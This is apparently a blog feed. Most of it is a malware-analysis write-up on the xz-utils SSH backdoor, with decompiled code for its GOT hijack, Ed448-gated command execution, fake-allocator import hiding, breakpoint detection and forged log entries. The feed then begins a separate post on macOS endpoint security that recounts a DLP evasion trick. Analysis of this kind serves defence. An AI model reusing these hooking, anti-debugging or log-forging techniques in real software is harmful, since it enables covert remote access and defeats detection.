<p>The backdoor hijacks the ifunc resolver because ifunc resolvers are executed very early during program startup, before the GOT and PLT are marked read-only for security reasons. By intercepting the ifunc resolver and injecting the malicious <code>_get_cpuid()</code> function, the backdoor can modify the GOT and PLT while they are still writable, allowing the hijacking of <code>RSA_public_decrypt()</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__int64 __fastcall <span class="hljs-title">sub_A710</span><span class="hljs-params">(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> a1, __int64 a2
{
    __int64 v4; <span class="hljs-comment">// r9</span>
    <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> v6; <span class="hljs-comment">// [rsp+14h] [rbp-4Ch] BYREF</span>
    <span class="hljs-keyword">char</span> v7[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [rsp+18h] [rbp-48h] BYREF</span>
    <span class="hljs-keyword">char</span> v8[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [rsp+1Ch] [rbp-44h] BYREF</span>
    __int64 v9[<span class="hljs-number">8</span>]; <span class="hljs-comment">// [rsp+20h] [rbp-40h] BYREF</span>

    v4 = <span class="hljs-number">0L</span>L;
    <span class="hljs-keyword">if</span> ( dword_CF48 == <span class="hljs-number">1</span> )
    {
        v9[<span class="hljs-number">0</span>] = <span class="hljs-number">1L</span>L;
        <span class="hljs-built_in">memset</span>(&amp;v9[<span class="hljs-number">1</span>], <span class="hljs-number">0</span>, <span class="hljs-number">32</span>);
        v9[<span class="hljs-number">5</span>] = a2;
        Llzma_block_param_encoder_0(v9, a2, a3, a4, v9, <span class="hljs-number">0L</span>L);
        v4 = a2;
    }
    ++dword_CF48;
    cpuid(a1, &amp;v6, v7, v8, v9, v4);
    <span class="hljs-keyword">return</span> v6;
}</span></span>
</code></pre>
<p>The <code>Llzma_index_prealloc_0()</code> function appears to be the hook that takes the place of <code>RSA_public_decrypt()</code> once its GOT (Global Offset Table) entry has been hijacked. The code first checks that the <code>Llzma12_coder_1</code> variable is not null, and then retrieves the address of the original <code>RSA_public_decrypt()</code> function so that it can fall through to it.</p>
<pre><code class="lang-c"><span class="hljs-function">__int64 __fastcall <span class="hljs-title">Llzma_index_prealloc_0</span><span class="hljs-params">(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> a1, __int64 a2, __int64 a3,  __int64 a4, __int32 a5)</span>
</span>{
    __int64 (__fastcall **v4)(_QWORD, __int64, __int64, __int64); <span class="hljs-comment">// rax</span>
    __int64 (__fastcall *v5)(_QWORD, __int64, __int64, __int64); <span class="hljs-comment">// r14</span>
    __int64 result; <span class="hljs-comment">// rax</span>
    __int64 v8; <span class="hljs-comment">// [rsp+0h] [rbp-48h]</span>
    <span class="hljs-keyword">int</span> v9[<span class="hljs-number">11</span>]; <span class="hljs-comment">// [rsp+1Ch] [rbp-2Ch] BYREF</span>

    <span class="hljs-keyword">if</span> ( !Llzma12_coder_1 )
        <span class="hljs-keyword">return</span> <span class="hljs-number">0L</span>L;
    v4 = *(__int64 (__fastcall ***)(_QWORD, __int64, __int64, __int64))(Llzma12_coder_1 + <span class="hljs-number">8</span>);
    <span class="hljs-keyword">if</span> ( !v4 )
        <span class="hljs-keyword">return</span> <span class="hljs-number">0L</span>L;
    v5 = *v4;
    <span class="hljs-keyword">if</span> ( !*v4 )
        <span class="hljs-keyword">return</span> <span class="hljs-number">0L</span>L;
    <span class="hljs-keyword">if</span> ( !a4 )
        <span class="hljs-keyword">return</span> v5(a1, a2, a3, a4);
    v8 = a4;
    v9[<span class="hljs-number">0</span>] = <span class="hljs-number">1</span>;
    result = Llzma_index_stream_size_1(a4, Llzma12_coder_1, v9);
    a4 = v8;
    <span class="hljs-keyword">if</span> ( v9[<span class="hljs-number">0</span>] )
        <span class="hljs-keyword">return</span> v5(a1, a2, a3, a4);
    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<p>The hook verifies a signature supplied by the connecting client (one that also covers the server's host key) against a specific hard-coded <a target="_blank" href="https://eprint.iacr.org/2015/625">Ed448</a> public key; when this check succeeds, it executes the attacker's command through the <code>system()</code> function. Otherwise, it just continues on to the original function. Because the hook sits on <code>RSA_public_decrypt</code>, a function originally used for <a target="_blank" href="https://www.openssl.org/docs/manmaster/man3/RSA_public_decrypt.html">validating RSA signatures</a>, the code can tamper with SSH's authentication mechanism. The hook code examines the <code>RSA</code> public modulus, and this modulus is completely controlled by the attackers who are connecting to the SSH server.</p>
<p>When the attacker logs into the impacted machine with a crafted SSH certificate, the attack payload is extracted from the public key, then further verified, and finally decrypted using the <a target="_blank" href="https://cr.yp.to/chacha.html">ChaCha20</a> symmetric stream cipher, and the decrypted data is executed as a command. The ChaCha20 key is the following 32 bytes, which are also the first 32 bytes of the Ed448 public key shown further down:</p>
<pre><code class="lang-plaintext">0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
</code></pre>
<p>The decrypted data contains a 114-byte signature, which is verified against the following Ed448 public key:</p>
<pre><code class="lang-plaintext">0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
10 0c b0 6c 3a be 14 ee 89 55 d2 45 00 c7 7f 6e
20 d3 2c 60 2b 2c 6d 31 00
</code></pre>
<p>The decrypted payload string is then executed as a shell command by passing it directly to <code>system()</code> (through a fake allocator mechanism that will be discussed in the next section), but only if the signature is confirmed as valid. Otherwise, the code passes execution back to the original function.</p>
<pre><code class="lang-c"><span class="hljs-function">__int64 __fastcall <span class="hljs-title">Llzma_delta_decoder_init_part_0</span><span class="hljs-params">(_QWORD *a1)</span>
</span>{
    __int64 result; <span class="hljs-comment">// rax</span>
    result = <span class="hljs-number">5L</span>L;
    <span class="hljs-keyword">if</span> ( a1 )
    {
        a1[<span class="hljs-number">7</span>] = &amp;Lfilter_options_0;
        result = <span class="hljs-number">0L</span>L;
        <span class="hljs-keyword">if</span> ( !a1[<span class="hljs-number">6</span>] )
        {
            a1[<span class="hljs-number">13</span>] = <span class="hljs-number">4L</span>L;
            a1[<span class="hljs-number">8</span>] = sub_28C0;
            a1[<span class="hljs-number">9</span>] = Llzma_index_prealloc_0;
            a1[<span class="hljs-number">10</span>] = Llzma12_mode_map_part_1;
            a1[<span class="hljs-number">11</span>] = Lfile_info_decode_0;
            a1[<span class="hljs-number">14</span>] = Lbt_skip_func_part_0;
            a1[<span class="hljs-number">15</span>] = <span class="hljs-number">101L</span>L;
        }
    }
    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<p>The public key is known, but only the attackers hold the corresponding Ed448 private signing key, so only they can use the backdoor. The signature is also bound to the host’s public key, meaning that a valid signature can't be reused on a different host.</p>
<hr />
<h3 id="heading-stealthy-anti-forensic-tricks">Stealthy Anti-Forensic Tricks</h3>
<p>The code tries very hard (harder than most malware) to remain hidden. If the sophistication of the obfuscation and of the backdoor delivery hasn't convinced you that this is the work of a state-backed actor, then the lengths it goes to in order to hide its activities might.</p>
<p>The liblzma library provides a memory allocation layer that forwards allocation and deallocation requests to dedicated allocator objects. When calling <code>lzma_alloc</code> or <code>lzma_free</code>, the library essentially invokes the corresponding function pointers within the provided allocator object.</p>
<p>The malware implements a fake allocator by abusing the <code>lzma_alloc</code> function from the liblzma library. Instead of performing memory allocation, this fake allocator is designed to look up symbol addresses based on string IDs. When <code>lzma_alloc</code> is called with a string ID as the size argument, the fake allocator interprets it as a request to resolve the corresponding symbol. The string IDs used by the malware are divisible by 8 and fall roughly within the range of <code>0x10</code> to <code>0xd10</code>, making them look like plausible size values at first glance.</p>
<p>The fake allocator object is returned by a function named <code>.Lstream_decoder_memconfig.part.1</code>. This allocator structure contains a context pointer, which is passed to the allocation and deallocation functions. In the case of the fake allocator, the <code>opaque</code> member of the allocator structure is used to store a pointer to internal ELF module descriptor records, providing additional context for symbol resolution.</p>
<p>The usage pattern of the fake allocator can be summarized as follows: First, the <code>GetFakeAllocator</code> function is called to obtain a pointer to the fake allocator object. Next, the <code>opaque</code> member of the allocator is set to point to the ELF module descriptor for the desired library (e.g., libc). Then, <code>lzma_alloc</code> is called with a string ID representing the symbol to be resolved (e.g., <code>0xAB8</code> for <code>setresuid</code>). The returned pointer represents the resolved symbol address, which can be used or stored by the malware as needed.</p>
<p>This allocator is used to resolve and call <code>system()</code>, effectively hiding these calls from static analysis. The <code>lzma_alloc</code> function is typically used for memory allocation purposes within the liblzma library. However, the malware hijacks this function and repurposes it as an import resolution mechanism. The malware achieves this by implementing a custom <code>lzma_allocator</code> structure and providing it to the <code>lzma_alloc</code> function.</p>
<p>The <code>lzma_allocator</code> structure has three fields: <code>alloc</code>, <code>free</code>, and <code>opaque</code>. The malware sets the <code>alloc</code> field to point to the <code>Linit_pric_table_part_1</code> function, and the <code>free</code> field to <code>Lstream_decode_1</code>. However, the true purpose of these functions is not memory allocation/deallocation; instead, they serve as wrappers for resolving and calling imported functions.</p>
<pre><code class="lang-c">system_func = lzma_alloc(STR_system_, lzma_allocator);
ctx-&gt;system = system_func;
<span class="hljs-keyword">if</span> (system_func)
    ++ctx-&gt;num_imports;
</code></pre>
<p>In this code snippet, <code>STR_system_</code> is the analyst-assigned name for the numeric string ID that stands for the "system" function name. Because the ID is passed as the size argument, <code>lzma_alloc</code> forwards it to the fake allocator, which treats it as a request to resolve the <code>system()</code> import and returns the corresponding function address, which is then stored in <code>system_func</code>.</p>
<pre><code class="lang-c">ulong _Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, undefined *elf_info, ctx *ctx)
{
    <span class="hljs-keyword">long</span> lzma_allocator;
    ulong uVar1;
    <span class="hljs-keyword">void</span> *fn_read;
    <span class="hljs-keyword">void</span> *fn___errno_location;

    <span class="hljs-comment">// Get the address of the custom lzma_allocator</span>
    lzma_allocator = get_lzma_allocator(<span class="hljs-number">1</span>);

    <span class="hljs-comment">// Parse the ELF file and store information in elf_info</span>
    uVar1 = parse_elf(*p_elf, elf_info);

    <span class="hljs-comment">// If the ELF parsing was successful</span>
    <span class="hljs-keyword">if</span> ((<span class="hljs-keyword">int</span>)uVar1 != <span class="hljs-number">0</span>) {
        <span class="hljs-comment">// Store the parsed elf_info in the opaque field of lzma_allocator</span>
        *(undefined **)(lzma_allocator + <span class="hljs-number">0x10</span>) = elf_info;

        <span class="hljs-comment">// Resolve the "read" import using lzma_alloc</span>
        fn_read = (<span class="hljs-keyword">void</span> *)lzma_alloc(<span class="hljs-number">0x308</span>, lzma_allocator);
        ctx-&gt;fn_read = fn_read;
        <span class="hljs-keyword">if</span> (fn_read != (<span class="hljs-keyword">void</span> *)<span class="hljs-number">0x0</span>) {
            ctx-&gt;num_imports++;
        }

        <span class="hljs-comment">// Resolve the "__errno_location" import using lzma_alloc</span>
        fn___errno_location = (<span class="hljs-keyword">void</span> *)lzma_alloc(<span class="hljs-number">0x878</span>, lzma_allocator);
        ctx-&gt;__errno_location = fn___errno_location;
        <span class="hljs-keyword">if</span> (fn___errno_location != (<span class="hljs-keyword">void</span> *)<span class="hljs-number">0x0</span>) {
            ctx-&gt;num_imports++;
        }

        <span class="hljs-comment">// Set uVar1 to 1 if both imports were resolved successfully</span>
        uVar1 = (ulong)(ctx-&gt;num_imports == <span class="hljs-number">2</span>);
    }

    <span class="hljs-keyword">return</span> uVar1;
}
</code></pre>
<p>The third field of the <code>lzma_allocator</code> structure, accessed via the offset <code>0x10</code> (<code>lzma_allocator + 0x10</code>), is abused to pass information about the loaded ELF file to the "fake allocator" function. This field, which can be considered as the <code>opaque</code> field, is set to the <code>elf_info</code> pointer (<code>*(undefined **)(lzma_allocator + 0x10) = elf_info;</code>), which contains information about the parsed ELF file. This information can then be used by the "fake allocator" functions, such as <code>Linit_pric_table_part_1</code> (acting as the <code>alloc</code> function) and <code>Lstream_decode_1</code> (acting as the <code>free</code> function), to perform additional operations based on the loaded ELF file.</p>
<p>This allows the malware to hide critical function calls from static analysis tools, as these calls are not directly visible in the binary's code. Additionally, by abusing the <code>lzma_alloc</code> function, the malware can dynamically resolve and call imported functions without relying on traditional import resolution mechanisms, making it harder to detect and analyze the malware's behavior.</p>
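<p>To make the mechanism concrete, here is a minimal user-space sketch of an allocator-shaped symbol resolver. It is not the backdoor's code: the struct only mirrors the three fields described above, while <code>module_info</code>, <code>symbol_entry</code>, <code>resolve_by_id</code>, <code>alloc_via</code> and <code>demo_target</code> are hypothetical names, and the ID <code>0x308</code> is borrowed from the decompiled snippet purely as a sample value.</p>
<pre><code class="lang-c">#include &lt;assert.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdio.h&gt;

/* Same three-field shape as an lzma_allocator: alloc, free, opaque. */
typedef struct {
    void *(*alloc)(void *opaque, size_t nmemb, size_t size);
    void  (*free)(void *opaque, void *ptr);
    void  *opaque;   /* sits at offset 0x10 on a 64-bit build */
} fake_allocator;

/* Hypothetical stand-in for the backdoor's ELF module descriptor. */
typedef struct {
    size_t id;       /* string ID disguised as an allocation size */
    void  *addr;     /* resolved symbol address */
} symbol_entry;

typedef struct {
    const symbol_entry *symbols;
    size_t              count;
} module_info;

/* Harmless stand-in for a libc function the backdoor would resolve. */
static int demo_target(int x) { return x + 1; }

/* The "alloc" callback: treats the size as an ID and looks it up. */
static void *resolve_by_id(void *opaque, size_t nmemb, size_t size)
{
    const module_info *mod = opaque;
    (void)nmemb;
    if (mod == NULL)
        return NULL;
    for (size_t i = 0; i &lt; mod-&gt;count; i++)
        if (mod-&gt;symbols[i].id == size)
            return mod-&gt;symbols[i].addr;
    return NULL;
}

/* The "free" callback does nothing in this sketch. */
static void fake_free(void *opaque, void *ptr) { (void)opaque; (void)ptr; }

/* What an lzma_alloc-style wrapper boils down to for a custom allocator. */
static void *alloc_via(size_t size, const fake_allocator *a)
{
    return a-&gt;alloc(a-&gt;opaque, 1, size);
}

int main(void)
{
    /* Function-to-void* casts are POSIX-style, as with dlsym(). */
    symbol_entry   table[]   = { { 0x308, (void *)demo_target } };
    module_info    libc_like = { table, 1 };
    fake_allocator allocator = { resolve_by_id, fake_free, NULL };

    /* Same step as the write to offset 0x10 in the decompiled code. */
    allocator.opaque = &amp;libc_like;

    int (*fn)(int) = (int (*)(int))alloc_via(0x308, &amp;allocator);
    assert(fn == demo_target);
    printf("resolved call returned %d\n", fn(41));

    assert(alloc_via(0x310, &amp;allocator) == NULL);  /* unknown ID */
    return 0;
}
</code></pre>
<p>To anyone skimming the call site, <code>alloc_via(0x308, &amp;allocator)</code> looks like a 776-byte allocation, which is the whole point of the disguise.</p>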
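<p>The binary also checks whether a debugger has inserted a software breakpoint. It checks if the instruction at the given <code>code_addr</code> is still the <code>endbr64</code> instruction (bytes <code>F3 0F 1E FA</code>, read as the little-endian value <code>0xfa1e0ff3</code>), which compilers emit at function entry points when Intel CET is enabled. A software breakpoint overwrites the first byte of an instruction with <code>int3</code> (<code>0xCC</code>), so the comparison fails once a breakpoint has been placed there.</p>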
<pre><code class="lang-c"><span class="hljs-comment">// Check if the instruction endbr64 is overwritten (software breakpoint detection)</span>
<span class="hljs-function"><span class="hljs-keyword">bool</span> <span class="hljs-title">breakpointcheck</span><span class="hljs-params">(<span class="hljs-keyword">int</span> *param_1,<span class="hljs-keyword">long</span> param_2,uint param_3)</span>
</span>{
  <span class="hljs-keyword">bool</span> bVar1;
  bVar1 = <span class="hljs-literal">false</span>;
  <span class="hljs-keyword">if</span> (<span class="hljs-number">3</span> &lt; param_2 - (<span class="hljs-keyword">long</span>)param_1) {
    bVar1 = (param_3 | <span class="hljs-number">0x5e20000</span>) + *param_1 == <span class="hljs-number">0xf223</span>;<span class="hljs-comment">// 5E2E230</span>
  }
  <span class="hljs-keyword">return</span> bVar1;
}
</code></pre>
<p>The condition checks that the difference between <code>param_2</code> and <code>(long)param_1</code> is greater than 3, which ensures there are at least 4 bytes to read, the size of the <code>endbr64</code> instruction. If so, the function returns the result of the expression <code>(param_3 | 0x5e20000) + *param_1 == 0xf223</code>. With 32-bit wraparound, <code>0xfa1e0ff3 + 0x5e2e230</code> equals <code>0xf223</code>. So, provided <code>param_3 | 0x5e20000</code> evaluates to <code>0x5e2e230</code> (the value noted in the comment), the expression is true exactly when the dword at <code>param_1</code> is <code>0xfa1e0ff3</code>, the <code>endbr64</code> instruction. Splitting the constant this way presumably keeps the <code>endbr64</code> byte pattern from appearing literally in the backdoor's own code.</p>
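<p>The arithmetic is easy to verify in isolation. The sketch below replays the same check in user space on a little-endian machine; <code>starts_with_endbr64</code> is a hypothetical name, and the value <code>0xE230</code> passed for the third parameter is an assumption inferred from the <code>5E2E230</code> comment in the decompilation.</p>
<pre><code class="lang-c">#include &lt;assert.h&gt;
#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/* Little-endian dword for the bytes F3 0F 1E FA (endbr64). */
#define ENDBR64_DWORD 0xFA1E0FF3u

/* Same arithmetic as the decompiled check: the endbr64 constant never
 * appears in the comparison, only a value that sums with it to 0xF223. */
static int starts_with_endbr64(const uint8_t *code, const uint8_t *code_end,
                               uint32_t low_bits)
{
    uint32_t insn;

    if (code_end - code &lt; 4)
        return 0;                          /* not enough bytes to read */
    memcpy(&amp;insn, code, sizeof insn);      /* unaligned-safe 4-byte read */
    return (uint32_t)((low_bits | 0x5E20000u) + insn) == 0xF223u;
}

int main(void)
{
    uint8_t intact[]  = { 0xF3, 0x0F, 0x1E, 0xFA, 0x55 };  /* endbr64; push rbp */
    uint8_t patched[] = { 0xCC, 0x0F, 0x1E, 0xFA, 0x55 };  /* int3 over byte 0 */

    /* 0xFA1E0FF3 + 0x05E2E230 wraps around to 0x0000F223 in 32 bits. */
    assert((uint32_t)(ENDBR64_DWORD + 0x05E2E230u) == 0xF223u);

    printf("intact:  %d\n",
           starts_with_endbr64(intact, intact + sizeof intact, 0xE230));
    printf("patched: %d\n",
           starts_with_endbr64(patched, patched + sizeof patched, 0xE230));
    return 0;
}
</code></pre>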
<p>As the attacker uses this remote code execution exploit to bypass SSH's regular authentication methods, one might assume that this activity is easily fingerprinted in the SSH connection logs. But the code appears to have a mechanism to construct fake log entries to replace a successful connection message in an SSH server's log.</p>
<pre><code class="lang-c">ConnectionClosedBy = ssh_consts-&gt;ConnectionClosedBy;
<span class="hljs-keyword">for</span> (i = <span class="hljs-number">0L</span>L; i != <span class="hljs-number">21</span>; log_line[i - <span class="hljs-number">1</span>] = v26) <span class="hljs-comment">// "Connection closed by "</span>
   v26 = *(ConnectionClosedBy + i++);
authenticating = ssh_consts-&gt;authenticating; <span class="hljs-comment">// "authenticating"</span>
<span class="hljs-keyword">for</span> (j = <span class="hljs-number">0L</span>L; j != <span class="hljs-number">14</span>; ++j)
   log_line[j + <span class="hljs-number">21</span>] = *(authenticating + j);
log_line[<span class="hljs-number">35</span>] = <span class="hljs-string">' '</span>;
user_string = ssh_consts-&gt;user_string; <span class="hljs-comment">// "user"</span>
<span class="hljs-keyword">for</span> (k = <span class="hljs-number">0L</span>L; k != <span class="hljs-number">4</span>; ++k)
   log_line[k + <span class="hljs-number">36</span>] = *(user_string + k);
log_line[<span class="hljs-number">40</span>] = <span class="hljs-string">' '</span>;
v31 = ssh_consts-&gt;string_percent_s_key; <span class="hljs-comment">// "%s"</span>
log_line[<span class="hljs-number">41</span>] = *v31;
LOBYTE(v31) = v31[<span class="hljs-number">1</span>];
log_line[<span class="hljs-number">43</span>] = <span class="hljs-string">' '</span>;
log_line[<span class="hljs-number">42</span>] = v31;
v32 = ssh_consts-&gt;string_percent_s_key; <span class="hljs-comment">// %s</span>
log_line[<span class="hljs-number">44</span>] = *v32;
LOBYTE(v32) = v32[<span class="hljs-number">1</span>];
*&amp;log_line[<span class="hljs-number">46</span>] = <span class="hljs-string">'['</span>; <span class="hljs-comment">// "["</span>
log_line[<span class="hljs-number">45</span>] = v32;
string_preauth = ssh_consts-&gt;string_preauth; <span class="hljs-comment">// "preauth"</span>
<span class="hljs-keyword">for</span> (m = <span class="hljs-number">0L</span>L; m != <span class="hljs-number">7</span>; ++m)
{
   LOBYTE(ConnectionClosedBy) = *(string_preauth + m);
   log_line[m + <span class="hljs-number">48</span>] = ConnectionClosedBy;
}
log_line[<span class="hljs-number">55</span>] = <span class="hljs-string">']'</span>; <span class="hljs-comment">// "]"</span>
v19 = LODWORD(ssh_consts-&gt;field_8) == <span class="hljs-number">0</span>;
ssh_consts-&gt;started_ssh_log_hiding = <span class="hljs-number">1</span>;
<span class="hljs-keyword">if</span> (!v19)
{
   <span class="hljs-keyword">if</span> (runtime_functions)
   {
       v35 = runtime_functions-&gt;setlogmask;
       <span class="hljs-keyword">if</span> (v35)
           v35(<span class="hljs-number">0xFF</span>LL, string_preauth, &amp;log_line[<span class="hljs-number">48</span>], ConnectionClosedBy, v22, right_after_accept_string_1);
   }
}
result = MEMORY[<span class="hljs-number">0x7FEAAF6399B15</span>]( <span class="hljs-comment">// calls sshlogv</span>
   ssh_consts,
   <span class="hljs-number">3L</span>L,
   log_line,
   &amp;username,
   &amp;ip_address,
   right_after_accept_string);
</code></pre>
<p>The function starts by initializing several variables with values from the <code>ssh_consts</code> structure, which contains constants and strings used in the SSH server's logging mechanism. It then constructs a log entry string in the <code>log_line</code> buffer. The string starts with the text "Connection closed by" followed by the "authenticating" and "user" strings.</p>
<p>It adds placeholders for variables ("%s") and encloses the "preauth" string in square brackets. It then sets the <code>started_ssh_log_hiding</code> flag to 1, indicating that the log hiding functionality is in use. If a <code>runtime_functions</code> structure is available, it calls <code>setlogmask</code> with <code>0xFF</code>. Since <code>setlogmask()</code> takes a single mask argument, the extra arguments shown in the decompilation are most likely decompiler artifacts; a mask of <code>0xFF</code> lets all eight syslog priorities through.</p>
<pre><code class="lang-plaintext">Connection from 172.17.0.1 port 46722 on 172.17.0.2 port 22 rdomain ""
Connection closed by authenticating user root 172.17.0.1 port 46722 [preauth]
</code></pre>
<p>The backdoor effectively replaces log entries describing successful backdoor connections with entries describing failed connection attempts. So while you might see a spike in failed SSH connections in your logs, you might not be able to tell from the logs alone whether you're impacted by this backdoor or not.</p>
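<p>The offsets in the decompiled loops line up with an ordinary format string. The following sketch rebuilds it fragment by fragment; <code>put</code> and <code>build_log_format</code> are hypothetical helper names, and passing the address and port as a single string is an assumption made only to reproduce the sample log line.</p>
<pre><code class="lang-c">#include &lt;assert.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;syslog.h&gt;

/* Appends src at *pos and advances the cursor; no terminator is written. */
static void put(char *buf, size_t *pos, const char *src)
{
    size_t n = strlen(src);
    memcpy(buf + *pos, src, n);
    *pos += n;
}

/* Assembles the format string from fragments, landing on the same
 * offsets as the decompiled loops. Returns the length, or 0 if the
 * buffer is too small. */
static size_t build_log_format(char *buf, size_t cap)
{
    size_t pos = 0;

    if (cap &lt; 57)
        return 0;
    put(buf, &amp;pos, "Connection closed by ");  /* offsets 0..20  */
    put(buf, &amp;pos, "authenticating");         /* offsets 21..34 */
    put(buf, &amp;pos, " ");                      /* offset  35     */
    put(buf, &amp;pos, "user");                   /* offsets 36..39 */
    put(buf, &amp;pos, " ");                      /* offset  40     */
    put(buf, &amp;pos, "%s");                     /* offsets 41..42 */
    put(buf, &amp;pos, " ");                      /* offset  43     */
    put(buf, &amp;pos, "%s");                     /* offsets 44..45 */
    put(buf, &amp;pos, " [");                     /* offsets 46..47 */
    put(buf, &amp;pos, "preauth");                /* offsets 48..54 */
    put(buf, &amp;pos, "]");                      /* offset  55     */
    buf[pos] = '\0';
    return pos;
}

int main(void)
{
    char fmt[64];
    char line[128];
    size_t n = build_log_format(fmt, sizeof fmt);

    assert(n == 56);
    assert(strcmp(fmt,
        "Connection closed by authenticating user %s %s [preauth]") == 0);

    /* 0xFF is the mask that enables every syslog priority up to LOG_DEBUG. */
    assert(LOG_UPTO(LOG_DEBUG) == 0xFF);

    snprintf(line, sizeof line, fmt, "root", "172.17.0.1 port 46722");
    puts(line);
    return 0;
}
</code></pre>
<p>Building the string one fragment at a time means the complete message never sits in the binary as a single literal, so a plain <code>strings</code> pass over the backdoor won't surface it.</p>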
<hr />
<h2 id="heading-qampa-and-conclusions">Q&amp;A and Conclusions</h2>
<p><strong>Q :</strong> Is this a major problem? Should I burn every piece of Linux-based technology I have? Should I wake up my sysadmins at 12 am to fix this?</p>
<p><strong>A :</strong> As mentioned previously, the backdoor only compiles under x86-based systems running Debian, and a bleeding-edge or unstable version of Debian at that, which you SHOULD NEVER RUN IN A PRODUCTION ENVIRONMENT EVER.</p>
<p><strong>Q :</strong> But can an attacker repurpose this attack? Maybe by patching the authentication mechanism?</p>
<p><strong>A :</strong> This still means that they need to attack an x86 machine running a Debian distribution. The RCE does not compile on non-x86 machines (so M-series Macs are excluded), and it will also not compile if it's not part of a Debian or RPM package build. Even if someone was able to <a target="_blank" href="https://github.com/amlweems/xzbot?tab=readme-ov-file#ed448-patch">modify the compiled</a> exploit, it would still be too impractical to repurpose and exploit.</p>
<hr />
<p><strong>Q :</strong> Isn't the open source development supposed to stop this type of attack? Why didn't it get caught sooner?</p>
<p><strong>A :</strong> It's clear from the communications between the owner of xz-utils, Lasse Collin, and a couple of other suspicious GitHub accounts that he was pressured to make changes and cede control to Jia Tan, plus he was <a target="_blank" href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html">gaslit</a> and <a target="_blank" href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html">bullied</a> repeatedly. Add to that the fact that working on an open source decompression utility isn't as sexy as pushing PRs to Frida or the Linux kernel, and it makes sense why this happened.</p>
<p>The attack was caught because someone was able to audit the code independently, without having to manually reverse engineer the full source code or anything. Something you can't do as easily in a proprietary piece of software.</p>
<hr />
<p><strong>Q :</strong> Why wasn't this caught by systems like EDRs, AVs, or Runtime Dependency Monitoring tools like Amazon Inspector?</p>
<p><strong>A :</strong> Coverage of EDRs in Linux environments is not that good, so it's not entirely stupid to suggest that no amount of security mumbo-jumbo was able to catch this through heuristics. But many are forgetting the fact that this was deployed in unstable branches of many distros, which are not for production workloads and thus would probably not have security tools in place. It would be a different story if they got this into Ubuntu Server or RHEL.</p>
<p>For what it's worth, <a target="_blank" href="https://www.crowdstrike.com/blog/cve-2024-3094-xz-upstream-supply-chain-attack/">CrowdStrike did say</a> that they were able to detect the initial compilation of the binary through the usage of the <code>tr</code> command.</p>
<hr />
<p>Are there more sleeper RCEs hiding in popular Linux dependencies? I don't know. I do hope that this incident will inspire a lot of us to take a deeper look at many of the dependencies we blindly trust today.</p>
<p>Who did it? Nobody knows exactly, but some fingers are already being pointed at several <a target="_blank" href="https://www.wired.com/story/jia-tan-xz-backdoor/">old players</a>. The actor has gone to great lengths to make it seem like he works in China, from the UTC+8 commit times correlating to office hours in the Mainland to using a Singaporean VPN node. But this seems a bit too easy to spot and is likely a misdirection strategy. For what it's worth, I do believe it's a state-sponsored attack and not some single-guy basement dweller; I just don't have the confidence (or experience) to say who exactly.</p>
<p>Did this take a lot more time than I had expected? Yes.</p>
]]></content:encoded></item><item><title><![CDATA[Internals of macOS Endpoint Security Products]]></title><description><![CDATA[Cover Illustration by cloudnienty

This research was done using software obtained by myself individually, analyzed using hardware owned by myself individually. Some code is simplified and edited to provide clarity.
The article is not intended to harm...]]></description><link>https://research.meekolab.com/internals-of-macos-endpoint-security-products</link><guid isPermaLink="true">https://research.meekolab.com/internals-of-macos-endpoint-security-products</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Sat, 17 Feb 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1711394846463/759c8160-c7cd-4bcd-993f-2d081a6b1590.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by cloudnienty</em></strong></p>
<hr />
<p><strong><em>This research was done using software obtained by myself individually, analyzed using hardware owned by myself individually. Some code is simplified and edited to provide clarity.</em></strong></p>
<p><strong>The article is not intended to harm any company’s product and is constructed for educational purposes only.</strong></p>
<hr />
</blockquote>
<p>The theft of Google's proprietary TPU architecture by a Chinese national has underscored the risk of insider threats and the importance of endpoint security systems like EDRs and DLPs in the prevention of cloud-based exfiltration methods.</p>
<p>According to the indictment by the DOJ, he exfiltrated the data by copying the contents of the document from the Google source files into the Apple Notes application on his Google work laptop, and then converting them from Apple Notes to PDFs to avoid detection by Google’s DLP systems. This is admittedly a clever, albeit stupid, way of circumventing endpoint security systems. So if Google, which probably spends <a target="_blank" href="https://www.reddit.com/r/sysadmin/comments/6k85q1/which_dlp_do_you_use_in_your_environments/">millions a year</a> on security software, can still get their proprietary information stolen using the Apple Notes app, how does your implementation fare?</p>
<p>While the process of dissecting endpoint security agents and drivers in Windows is well documented, the same can't be said for macOS-based security solutions. While the implementation of DLP/EDR systems will become easier with the advent of <a target="_blank" href="https://developer.apple.com/support/kernel-extensions/">System Extensions</a> and the <a target="_blank" href="https://blog.maikxchd.com/introduction-to-the-apple-endpoint-security-framework">Endpoint Security API</a>, older implementations might look like a black box in comparison. So as a goodbye to kernel extensions, we're gonna take a quick dive into how security products use kernel extensions.</p>
<h3 id="heading-the-funny-world-of-macos-internals">The Funny World of macOS Internals</h3>
<p>macOS is based on the <a target="_blank" href="https://github.com/apple-oss-distributions/xnu">XNU</a> kernel ("X is Not Unix"), which is a hybrid kernel that combines elements from both Mach and BSD.</p>
<p>Mach is a UNIX-compatible microkernel which is designed to minimize the amount of code running in the <strong>kernel</strong> space and instead allow many typical kernel functions, such as file system, networking, and I/O, to <strong>run as</strong> user-level tasks. Mach is responsible for many low-level operations a kernel typically handles, such as processor scheduling, multitasking, and virtual memory management.</p>
